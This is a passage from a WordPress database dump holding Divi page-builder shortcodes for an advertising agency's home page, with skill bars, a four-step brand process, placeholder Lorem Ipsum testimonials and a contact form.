type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12.png\" alt=\"Best Advertising agency\" title_text=\"best advertising agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5.jpg\" alt=\"marketing strategy\" title_text=\"marketing strategy\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\" hover_enabled=\"0\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-06 21:12:29','2020-08-06 21:12:29','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/06/134-revision-v1/',0,'revision','',0),(456,1,'2020-08-06 21:15:03','2020-08-06 21:15:03','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.5.2\" background_color=\"#fcd21d\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Desktop-HD-1024x728-1.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" 